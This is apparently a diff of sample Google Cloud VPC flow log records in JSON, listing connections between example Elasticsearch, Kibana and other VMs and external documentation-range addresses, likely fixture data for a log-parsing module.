-{"insertId":"1gq7q7afe373ff","jsonPayload":{"bytes_sent":"107878","connection":{"dest_ip":"203.0.113.58","dest_port":65276,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"614","reporter":"SRC","rtt_msec":"156","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fq","jsonPayload":{"bytes_sent":"595838","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":52430},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"299","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"14iipwlfd8t01n","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":56410,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"SRC","rtt_msec":"37","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01j","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":51950,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01o","jsonPayload":{"bytes_sent":"361966","connection":{"dest_ip":"203.0.113.134","dest_port":33876,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"80","reporter":"SRC","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01p","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":51950},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01e","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":58658,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01q","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":59924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":58658},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01k","jsonPayload":{"bytes_sent":"123732","connection":{"dest_ip":"203.0.113.58","dest_port":65272,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"618","reporter":"SRC","rtt_msec":"123","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01f","jsonPayload":{"bytes_sent":"76342","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65273},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"710","reporter":"DEST","rtt_msec":"115","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t018","jsonPayload":{"bytes_sent":"9761","connection":{"dest_ip":"192.0.2.73","dest_port":45224,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"end_time":"2019-06-14T03:44:23.955039461Z","packets_sent":"13","reporter":"SRC","rtt_msec":"242","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01a","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":56410},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"DEST","rtt_msec":"37","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t017","jsonPayload":{"bytes_sent":"51612","connection":{"dest_ip":"203.0.113.58","dest_port":65277,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"615","reporter":"SRC","rtt_msec":"95","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01m","jsonPayload":{"bytes_sent":"74330","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65272},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"745","reporter":"DEST","rtt_msec":"123","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t015","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"203.0.113.12","dest_port":59924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01h","jsonPayload":{"bytes_sent":"76622","connection":{"dest_ip":"203.0.113.58","dest_port":65273,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"599","reporter":"SRC","rtt_msec":"115","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t019","jsonPayload":{"bytes_sent":"42","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.0.2.73","src_port":45224},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:24.922448897Z","packets_sent":"5","reporter":"DEST","rtt_msec":"242","src_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t016","jsonPayload":{"bytes_sent":"75263","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65277},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"729","reporter":"DEST","rtt_msec":"95","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01c","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":34646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:10.529592195Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:10.413494375Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01d","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":34646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:10.529541195Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:10.413397239Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01g","jsonPayload":{"bytes_sent":"5044","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"87","reporter":"DEST","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01l","jsonPayload":{"bytes_sent":"14132","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"91","reporter":"DEST","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01b","jsonPayload":{"bytes_sent":"151213","connection":{"dest_ip":"203.0.113.134","dest_port":33574,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"68","reporter":"SRC","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"ut8lbrffooxyw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.13","dest_port":33478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxzb","jsonPayload":{"bytes_sent":"173663","connection":{"dest_ip":"10.87.40.76","dest_port":33970,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"68","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxze","jsonPayload":{"bytes_sent":"155707","connection":{"dest_ip":"67.43.156.13","dest_port":33576,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821143836Z","packets_sent":"78","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyz","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.168.2.23","dest_port":59679,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint Petersburg"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz6","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.168.2.117","dest_port":50646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxzf","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":50646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 